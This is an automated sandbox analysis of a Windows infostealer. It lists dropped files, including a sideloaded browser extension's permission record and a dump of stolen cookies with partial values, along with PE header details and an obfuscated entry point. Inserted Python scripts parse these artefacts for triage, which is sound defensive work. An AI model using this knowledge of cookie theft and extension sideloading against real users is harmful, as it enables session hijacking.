• Antivirus: ReversingLabs, Detection: 0%
C:\Users\user\AppData\Local\Web Data1612045902911
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
C:\Users\user\AppData\Local\crx.7z
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:7-zip archive data, version 0.3
Category:dropped
Size (bytes):36105
Entropy (8bit):7.994610469125073
Encrypted:true
SSDEEP:768:gzRRD+bIdsGw/mJaXyGteg6/Ys175i+SQwcvDcViSvXhqisEKXz:gzRN5sG2mJjGeg6/J7VSVWDcLvxqisEU
MD5:DAFDD7237BA10D0C91295CD1C15749B2
SHA1:45D55EE145BC71921271BA5493F13D3428589D4D
SHA-256:B0D675F1E5D4F772CD90E59A2D64D24CF682A1C966FECCA50C87C985F64E4136
SHA-512:50FEF821BF531A439CD00099EE90C938AF3D6A3FF71C8CD57D31D8CA9F5FF68E3B9D40118AC038A1C6BD7ADD43D7B35759376BBD4BEAF592359A1EF0A86E86B5
Malicious:false
                                                                                                                                                                        Preview: 7z..'.....9........$........^x..D...z'...P.....P'.B..a.Ik.?h.O (<M..A...S...>l...[.y...E.BF.@.*w..43..{.b.G...(...=.Q.2'.9.l%..~.4..`~.uX6.....S.....T..K.\)}..,+>\YeFp-...<.Otpw......#.NV.........~.;.(..-.F~...R.$s..m..}/.>..x..>..Osw..m..A.O.h].dWz1.mf.-..'tI.H.So.$.~.7um..\[...-.m.wY.....0.`.......y...;......-..w..L".T.W..!...`6....U........n.(...z..".^...R..b.G.;.W....k2..|.jS...m.....M.jZ5W.>...j.....{T.H....Q.?.Ybun.......gPd....E.<k.Z.eA".k.G.......6'.a.X >o.D4.r...E...N.....w....S.........5..[O.=.?..Q..Q.,.."..@..5./.V...."[.K.:..V.......L..{.XYWU...^...........2x.E.b..E....1.....#Gl.3...2.W[X9.g.X`.u$fZ.o....z..>hY.?..g,T}S.q+........eT..0e..&..`2...[.s...{.._.h.C7c.zH.......!...'!`..].m..8V.-".....nVa....^...Tx/..........4.?.v.Z.....o......C.cWt8-.....^|..d..He...!.7....T.X..?.d0..ly...T..u......,L..S1.a.....:..3Z;*...M.73.......`....a....`C~}.r.&FOY..aA.w..y..5..K@.N..........0$.>..I.@#.:...q1...H.S...|....3...X.E.N.I7...]".50.6...or
                                                                                                                                                                        C:\Users\user\AppData\Local\crx.json
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1981
                                                                                                                                                                        Entropy (8bit):5.365969892012237
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:Y4xeW8t8pzxeW8t8poi5a+Q8EIelc1FE8t8RcvPQ:VxhxmiAvMQ
                                                                                                                                                                        MD5:B5CEED4A6FA3F501787DE10B4CB02EEE
                                                                                                                                                                        SHA1:F09C0A8CA18D825D6CE6F192090EBD0659C7321B
                                                                                                                                                                        SHA-256:749F47181C95AD070353887E477542AAE4AE41F2802CCCB8312F429767254CB8
                                                                                                                                                                        SHA-512:02B7DE9D7FDAB98F63837A5E98FA0DCCC90FEBB45EAC1CD13523315083D209FFD748513BF1AF5562F10C75E6C821D9B4003EFF3D13CD4CC8B2D76688682E95D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: {"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"creation_flags":1,"extension_can_script_all_urls":true,"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"initial_keybindings_set":true,"install_time":"13243077899481747","location":1,"manifest":{"background":{"persistent":true,"scripts":["jquery-1.8.3.min.js","background.js"]},"browser_action":{"default_icon":"icon.png","default_popup":"popup.html","default_title":"book_helper"},"content_scripts":[{"all_frames":false
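The crx.json record above has the shape of a Chromium extensions.settings entry: an extension installed outside the Web Store (from_webstore false) holding cookies, webRequestBlocking, history and browsingData plus script access to every http/https origin. The following triage script is an added example and is not part of the sandbox report; SAMPLE_RECORD is constructed to carry the permission set and flags visible in the preview, and the high-risk API list and finding texts are this example's own choices.

```python
"""Triage one Chromium extension settings record (crx.json style).

Added example, not from the report. SAMPLE_RECORD mirrors the preview's
permissions and flags; HIGH_RISK_APIS is this example's own list."""
import json

# Constructed to mirror the preview; not the complete dropped file.
SAMPLE_RECORD = json.dumps({
    "active_permissions": {
        "api": ["activeTab", "browsingData", "contentSettings", "contextMenus",
                "cookies", "downloads", "downloadsInternal", "history", "management",
                "privacy", "storage", "tabs", "topSites", "webNavigation",
                "webRequest", "webRequestBlocking"],
        "scriptable_host": ["http://*/*", "https://*/*"],
    },
    "creation_flags": 1, "extension_can_script_all_urls": True,
    "from_bookmark": False, "from_webstore": False, "location": 1,
    "manifest": {
        "background": {"persistent": True,
                       "scripts": ["jquery-1.8.3.min.js", "background.js"]},
        "browser_action": {"default_title": "book_helper"},
        "content_scripts": [{"all_frames": False,
                             "matches": ["http://*/*", "https://*/*"]}],
    },
})

# APIs that let an extension read or rewrite other sites' traffic and state.
HIGH_RISK_APIS = {"cookies", "webRequest", "webRequestBlocking", "history",
                  "browsingData", "management", "privacy", "contentSettings",
                  "tabs", "proxy", "debugger"}
ALL_HOSTS = {"<all_urls>", "http://*/*", "https://*/*", "*://*/*"}


def triage_extension_record(text: str) -> list:
    """Return human-readable findings for one extensions.settings record."""
    rec = json.loads(text)
    perms = rec.get("active_permissions", {})
    apis = set(perms.get("api", []))
    hosts = set(perms.get("scriptable_host", []))
    findings = []
    if not rec.get("from_webstore", True):
        findings.append("sideloaded: from_webstore is false")
    if hosts & ALL_HOSTS or rec.get("extension_can_script_all_urls"):
        findings.append("can inject content scripts into every http/https origin")
    risky = sorted(apis & HIGH_RISK_APIS)
    if risky:
        findings.append("high-risk APIs: " + ", ".join(risky))
    if "cookies" in apis and hosts & ALL_HOSTS:
        findings.append("cookies + all-host access: can read and replant any site's session")
    if {"webRequest", "webRequestBlocking"} <= apis:
        findings.append("webRequestBlocking: can rewrite or drop requests in flight")
    bg = rec.get("manifest", {}).get("background", {})
    if bg.get("persistent"):
        findings.append("persistent background page: " + ", ".join(bg.get("scripts", [])))
    return findings


if __name__ == "__main__":
    for line in triage_extension_record(SAMPLE_RECORD):
        print("-", line)
```

Run against a real profile, the same function applies to every value under extensions.settings in the browser's Preferences or Secure Preferences file; the from_webstore flag is the quickest way to separate extensions the user chose from ones a dropper registered.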
                                                                                                                                                                        C:\Users\user\AppData\Localwebdata1612045902958
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):73728
                                                                                                                                                                        Entropy (8bit):1.1874185457069584
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Roaming\1612045890161.exe
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):103632
                                                                                                                                                                        Entropy (8bit):6.404475911013687
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
                                                                                                                                                                        MD5:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                                        SHA1:B5EE276E8D479C270ECEB497606BD44EE09FF4B8
                                                                                                                                                                        SHA-256:6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
                                                                                                                                                                        SHA-512:EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 14%
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..s.i. .i. .i. .f. .i. .f. .i. .J. .i. .J. .i. .i. .h. .J. .i. (.. .i. (.. .i. (.. .i. Rich.i. ................PE..L....S.Z..........................................@..................................................................................@...W...........f...............................................................................................text............................... ..`.rdata...........0..................@..@.data........ ......................@....rsrc....W...@...X..................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Roaming\1612045890161.txt
                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\1612045890161.exe
                                                                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):27328
                                                                                                                                                                        Entropy (8bit):3.7078509698470126
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:b3w/3wBkf3DpvI6PprepmlmE1lVT0oMoSDNlkSP:bqg+flvIKpt3VvODNlkSP
                                                                                                                                                                        MD5:C82FB62C10E490945B2CB638D72998D2
                                                                                                                                                                        SHA1:1F746A26B442E8D69457445D78F0E2F52BAE9D66
                                                                                                                                                                        SHA-256:6CC5B1B6DB576F487EC2B21D258BEDFAA1E233DBA53A663C1019AF8ECC7F8D53
                                                                                                                                                                        SHA-512:A13B2F8C7796AE7276B52993ECC1627B58082321699D5C5C72D7BFC042F6B24283A26F227DFF0B8249769C5B2E96137A10391752BD28EE21672F44ADAB5429D3
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: ..[.........{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.0.:.2.3.:.0.6. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".1.2./.3.1./.2.0.3.7. .1.0.:.5.9.:.1.4. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".g.o.o.g.l.e...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".C.O.N.S.E.N.T.".,.....".V.a.l.u.e.".:.".W.P...2.7.b.6.d.e.".,.....".S.e.c.u.r.e.".:.".N.o.".,.....".H.T.T.P. .O.n.l.y.".:.".N.o.".,.....".H.o.s.t. .O.n.l.y.".:.".N.o.".,.....".E.n.t.r.y. .I.D.".:.".1.".,.....".T.a.b.l.e. .N.a.m.e.".:.".C.o.o.k.i.e.E.n.t.r.y.E.x._.1.2.".....}.....,.....{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.0.:.2.3.:.1.1. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".1.2./.2.7./.2.0.1.9. .9.:.2.3.:.1.1. .A.M.".,.....".H.o.s.t. .N.a.m.e.".:.".g.o.o.g.l.e...c.h.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".N.I.D.".,.....".V.a.l.u.e.".:.".1.8.6.=.f.q.t.N.G.i.j.l.-.o.b.4.K.y.V.I.p.O.b.W.8.G.z.s.h.L.K.8.N.W.5._.R.t.7.6.F.k.H.Q.W.U.N.y.S.-.V.3.z.5.y.T.b.R.q.2.m.w.h.c.z.E.m.a.5.
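The file 1612045890161.txt above is a UTF-16 JSON array of cookie records (host, name, value, expiry, Secure and HttpOnly flags) written by the dropped executable of the same name: a browser cookie dump. The script below is an added example, not part of the report, for decoding such a dump and listing which hosts' cookies were taken and which were still valid at the time. SAMPLE_DUMP is constructed with the field names from the preview; the cookie values and the NID "HTTP Only" flag are placeholders, and the reference date 2021-01-30 is an assumption taken from the millisecond timestamp in the file name.

```python
"""Decode a UTF-16 cookie-dump JSON and summarise what was stolen.

Added example, not from the report. SAMPLE_RECORDS are constructed to
match the preview's field names; values are placeholders."""
import json
from collections import defaultdict
from datetime import datetime

SAMPLE_RECORDS = [
    {"Modified Time": "6/27/2019 10:23:06 AM", "Expire Time": "12/31/2037 10:59:14 PM",
     "Host Name": "google.com", "Path": "/", "Name": "CONSENT", "Value": "WP.27b6de",
     "Secure": "No", "HTTP Only": "No", "Host Only": "No", "Entry ID": "1",
     "Table Name": "CookieEntryEx_12"},
    {"Modified Time": "6/27/2019 10:23:11 AM", "Expire Time": "12/27/2019 9:23:11 AM",
     "Host Name": "google.ch", "Path": "/", "Name": "NID", "Value": "186=placeholder",
     "Secure": "No", "HTTP Only": "Yes", "Host Only": "No", "Entry ID": "2",
     "Table Name": "CookieEntryEx_12"},
]
# Laid out like the dropped file: BOM, UTF-16LE, CRLF line ends.
SAMPLE_DUMP = ("\ufeff" + json.dumps(SAMPLE_RECORDS, indent=0)
               .replace("\n", "\r\n")).encode("utf-16-le")


def parse_cookie_dump(raw: bytes) -> list:
    """'utf-16' honours and strips the BOM; CR/LF are plain JSON whitespace."""
    return json.loads(raw.decode("utf-16"))


def cookies_by_host(records: list) -> dict:
    by_host = defaultdict(list)
    for r in records:
        by_host[r["Host Name"]].append(r["Name"])
    return dict(by_host)


def expiry(record: dict) -> datetime:
    # The dump uses US date order with a 12-hour clock, e.g. "6/27/2019 10:23:06 AM".
    return datetime.strptime(record["Expire Time"], "%m/%d/%Y %I:%M:%S %p")


def live_cookies(records: list, now: datetime) -> list:
    """(host, name) for cookies still valid at 'now': the ones an attacker can replay."""
    return [(r["Host Name"], r["Name"]) for r in records if expiry(r) > now]


if __name__ == "__main__":
    recs = parse_cookie_dump(SAMPLE_DUMP)
    print(cookies_by_host(recs))
    print(live_cookies(recs, datetime(2021, 1, 30)))  # assumed analysis date
```

The Secure and HTTP Only columns do not mitigate this collection: both flags constrain what a web page or script may do, not what a local process reading the cookie store can do, so a cookie marked HttpOnly is just as replayable once it is in the dump.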

                                                                                                                                                                        Static File Info

                                                                                                                                                                        General

                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Entropy (8bit):7.745694560857276
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                        File name:fnhcdXEfus.exe
                                                                                                                                                                        File size:4453376
                                                                                                                                                                        MD5:18169f98e39ae228d131aec477c8a2e9
                                                                                                                                                                        SHA1:c6c6eacaa8df6ea5251c7f26a2d9ec4317092e6a
                                                                                                                                                                        SHA256:344b323928698d9982c7577e5405a1cb587c45f94a0f6745827648381397f255
                                                                                                                                                                        SHA512:8deaca50e918252ba85715c85096e810733a9512c656fa40ad71e22437cc8f74d1965468592929a4b1216d33da598c308b312f5c1aa770f62959c873a4582efb
                                                                                                                                                                        SSDEEP:98304:bCgleegKSmFIJuPzyoCe1NGDyqMcKzH4znz8xViN:bBbviJu7JC0UDLwzanz8xQ
                                                                                                                                                                        File Content Preview:MZ......................@.............................................d....L.!This program cannot be run in DOS mode....$..............Z...Z...Zw]qZ...Zw]lZ...Z$\oZ...Z$\lZZ..Z)..Z...Z$\mZ...Z)..Z...Z...Zu..Zw]mZ...Zw]kZ...Z..5Z...Zw]nZ...ZRich...Z.......

                                                                                                                                                                        File Icon

                                                                                                                                                                        Icon Hash:497971328ce1634d

                                                                                                                                                                        Static PE Info

                                                                                                                                                                        General

                                                                                                                                                                        Entrypoint:0x44523a
                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                        Time Stamp:0x5BA39B6E [Thu Sep 20 13:06:54 2018 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                        File Version Major:5
                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                        Import Hash:d91a0a44f8762e656db1be8576dd54b2
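The Static File Info and Static PE Info fields above (per-file 8-bit entropy, entry point and its section, image base, link timestamp, subsystem, DLL characteristics, OS version) all come straight out of the PE headers. The script below is an added example, not part of the report, that reads them with the standard library only and adds the per-section checks a triage analyst wants: section entropy, a writable code section, and a section whose virtual size is far larger than its size on disk. The PE it parses is constructed in memory with the report's entry point, image base, timestamp and DLL characteristics and a deliberately writable, high-entropy .text section; the 7.0 entropy and 4x size thresholds are this example's own choices.

```python
"""Read 'Static PE Info' fields from a PE32 image and compute 8-bit entropy.

Added example, not from the report. build_sample_pe() constructs a minimal
PE32 with the report's header values; thresholds are this example's own."""
import math
import struct
from collections import Counter
from datetime import datetime, timezone

DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT", 0x0400: "NO_SEH",
                       0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE"}
SUBSYSTEMS = {2: "windows gui", 3: "windows cui"}
SCN_CODE, SCN_IDATA = 0x20, 0x40
SCN_EXEC, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000


def entropy8(data: bytes) -> float:
    """Shannon entropy in bits per byte, 0.0 .. 8.0 (the report's 'Entropy (8bit)')."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 (not the analysed sample): headers plus two sections."""
    text = bytes(range(256)) * 2                      # entropy exactly 8.0, like a packed stub
    data = bytes(256)                                 # all zeros, entropy 0.0
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0x5BA39B6E, 0, 0, 0xE0, 0x0102)
    opt = struct.pack("<HBBIII", 0x10B, 14, 0, len(text), len(data), 0)
    opt += struct.pack("<IIIIII", 0x4523A, 0x1000, 0x46000, 0x400000, 0x1000, 0x200)
    opt += struct.pack("<HHHHHH", 5, 1, 5, 1, 5, 1)                 # OS, image, subsystem versions
    opt += struct.pack("<IIII", 0, 0x47000, 0x200, 0)               # Win32Ver, SizeOfImage, SizeOfHeaders, CheckSum
    opt += struct.pack("<HH", 2, 0x8140)                            # GUI; TSA | NX_COMPAT | DYNAMIC_BASE
    opt += struct.pack("<IIIIII", 0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + bytes(128)
    sec = struct.Struct("<8sIIIIIIHHI")
    hdr = sec.pack(b".text", 0x45000, 0x1000, len(text), 0x200, 0, 0, 0, 0,
                   SCN_CODE | SCN_EXEC | SCN_READ | SCN_WRITE)      # writable code: packer trait
    hdr += sec.pack(b".data", len(data), 0x46000, len(data), 0x400, 0, 0, 0, 0,
                    SCN_IDATA | SCN_READ | SCN_WRITE)
    headers = (dos + b"PE\0\0" + coff + opt + hdr).ljust(0x200, b"\0")
    return headers + text + data


def parse_pe32(blob: bytes) -> dict:
    """Extract the header fields the report lists; PE32 only (Magic 0x10B)."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    _machine, nsec, ts, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", blob, pe + 4)
    opt = pe + 24                                     # optional header follows the 20-byte COFF header
    if struct.unpack_from("<H", blob, opt)[0] != 0x10B:
        raise ValueError("only PE32 handled here")
    entry, = struct.unpack_from("<I", blob, opt + 16)
    image_base, = struct.unpack_from("<I", blob, opt + 28)
    os_major, os_minor = struct.unpack_from("<HH", blob, opt + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", blob, opt + 68)
    sections = []
    for i in range(nsec):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, sc = struct.unpack_from(
            "<8sIIIIIIHHI", blob, opt + opt_size + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw_size": raw_size, "exec": bool(sc & SCN_EXEC),
                         "write": bool(sc & SCN_WRITE),
                         "entropy": entropy8(blob[raw_ptr:raw_ptr + raw_size])})
    entry_section = next((s["name"] for s in sections
                          if s["va"] <= entry < s["va"] + s["vsize"]), None)
    return {"entrypoint": image_base + entry, "entrypoint_section": entry_section,
            "image_base": image_base, "os_version": (os_major, os_minor),
            "timestamp": datetime.fromtimestamp(ts, tz=timezone.utc),
            "subsystem": SUBSYSTEMS.get(subsystem, hex(subsystem)),
            "dll_characteristics": [n for b, n in sorted(DLL_CHARACTERISTICS.items())
                                    if dll_chars & b],
            "sections": sections, "file_entropy": entropy8(blob)}


def packing_indicators(info: dict) -> list:
    """Static hints of a packer; the 7.0 and 4x thresholds are this example's choices."""
    hits = []
    for s in info["sections"]:
        if s["name"] == ".text" and s["write"]:
            hits.append(".text is writable")            # compilers do not emit that
        if s["exec"] and s["entropy"] > 7.0:
            hits.append(f"{s['name']}: executable with entropy {s['entropy']:.2f}")
        if s["vsize"] > 4 * max(s["raw_size"], 1):
            hits.append(f"{s['name']}: virtual size {s['vsize']:#x} vs {s['raw_size']:#x} on disk")
    return hits


if __name__ == "__main__":
    info = parse_pe32(build_sample_pe())
    print(f"{info['entrypoint']:#x} in {info['entrypoint_section']}, "
          f"{info['timestamp']:%Y-%m-%d %H:%M:%S} UTC, {info['dll_characteristics']}")
    print(packing_indicators(info))
```

A whole-file entropy of 7.75 like the sample's is already near the 8.0 ceiling; per-section entropy localises it, and a high-entropy executable section that is also writable and grows at load time is the usual signature of a stub that decrypts and runs code in place.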

                                                                                                                                                                        Entrypoint Preview
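The listing below repeats one wrapper three times: pushad, xor ebx,ebx, push dword ptr fs:[0], pop ebx, cmp ebx,4, jne, a run of instructions, popad. On 32-bit Windows fs:[0] is TEB.NtTib.ExceptionList, the pointer to the current SEH record (or 0xFFFFFFFF at the end of the chain), so it is never 4 and the jne is always taken: an opaque predicate that hops over junk bytes which a linear disassembler decodes as real instructions (the inc esi / call ebp / pop edx sequences). The scanner below is an added example, not part of the report; it matches the wrapper by its standard x86 encoding and the SAMPLE buffer is constructed, with the junk bytes chosen to decode as in the listing (the real sample's exact bytes are not on this page).

```python
"""Find and strip the pushad / opaque-jne / popad junk wrapper in raw x86 code.

Added example, not from the report. Byte-pattern heuristic, not a
disassembler; SAMPLE is constructed to resemble the listing."""
import re

# 60 = pushad, 31 DB or 33 DB = xor ebx,ebx, 64 FF 35 00000000 = push dword ptr fs:[0],
# 5B = pop ebx, 83 FB 04 = cmp ebx,4, 75 rel8 = jne (always taken: fs:[0] is never 4)
OPAQUE_JNE = re.compile(
    rb"\x60[\x31\x33]\xdb\x64\xff\x35\x00\x00\x00\x00\x5b\x83\xfb\x04\x75(.)", re.DOTALL)

WRAPPER = bytes.fromhex("60 31db 64ff3500000000 5b 83fb04 7510")   # jne +16 over the junk
JUNK = bytes.fromhex("46 8b0c24 01d0 8b0c24 8b09 ffd5 89f2 5a")     # 16 bytes, decode as in the listing
# Constructed: push ebp; mov ebp,esp; <wrapper><junk>popad; push 3
SAMPLE = bytes.fromhex("55 89e5") + WRAPPER + JUNK + b"\x61" + bytes.fromhex("6a03")


def find_opaque_jumps(code: bytes, base: int = 0) -> list:
    """Return (wrapper_start, jne_target, skipped_bytes) for each wrapper found."""
    hits = []
    for m in OPAQUE_JNE.finditer(code):
        rel8 = m.group(1)[0]
        rel8 = rel8 - 256 if rel8 >= 0x80 else rel8
        target = m.end() + rel8                  # rel8 is relative to the next instruction
        hits.append((base + m.start(), base + target, rel8))
    return hits


def lands_on_popad(code: bytes, hit: tuple, base: int = 0) -> bool:
    """True when the always-taken jump lands exactly on the closing popad (0x61)."""
    target = hit[1] - base
    return 0 <= target < len(code) and code[target] == 0x61


def strip_wrappers(code: bytes) -> bytes:
    """Remove each wrapper and its junk; what remains is the instruction stream that runs."""
    out, pos = bytearray(), 0
    for hit in find_opaque_jumps(code):
        start, target, _ = hit
        if lands_on_popad(code, hit) and start >= pos:
            out += code[pos:start]
            pos = target + 1                     # resume after the popad
    out += code[pos:]
    return bytes(out)


if __name__ == "__main__":
    for hit in find_opaque_jumps(SAMPLE, base=0x44523A):
        print(f"wrapper at {hit[0]:#x}, jne to {hit[1]:#x}, skips {hit[2]} bytes")
    print(strip_wrappers(SAMPLE).hex())
```

The same pattern is a natural YARA rule on the hex bytes above with the rel8 wildcarded; treating the skipped bytes as dead code is what turns the noisy listing back into the few real instructions (here push ebp, mov ebp,esp, push 3).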

                                                                                                                                                                        Instruction
                                                                                                                                                                        push ebp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        sub ebp, 18h
                                                                                                                                                                        mov dword ptr [ebp-14h], 0044523Ah
                                                                                                                                                                        pushad
                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                                                                        pop ebx
                                                                                                                                                                        cmp ebx, 04h
                                                                                                                                                                        jne 00007F8DB4EE0FA2h
                                                                                                                                                                        inc esi
                                                                                                                                                                        mov ecx, dword ptr [esp]
                                                                                                                                                                        add eax, edx
                                                                                                                                                                        mov ecx, dword ptr [esp]
                                                                                                                                                                        mov ecx, dword ptr [ecx]
                                                                                                                                                                        call ebp
                                                                                                                                                                        mov edx, esi
                                                                                                                                                                        pop edx
                                                                                                                                                                        popad

Rich Headers

Programming Language:
• [RES] VS2012 UPD1 build 51106
• [C++] VS2012 UPD1 build 51106
• [ C ] VS2012 UPD1 build 51106
• [LNK] VS2012 UPD1 build 51106

Data Directories

Name                                  | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT          | 0x9abd0         | 0xdc         | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        | 0xa8000         | 0x498ec      | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY        | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC       | 0xf2000         | 0x8454       | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           | 0x768a0         | 0x38         | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS             | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     | 0x87710         | 0x40         | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT             | 0x76000         | 0x4f4        | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    | 0x9a5b4         | 0xe0         | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED        | 0x0             | 0x0          |

Sections

Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy       | Characteristics
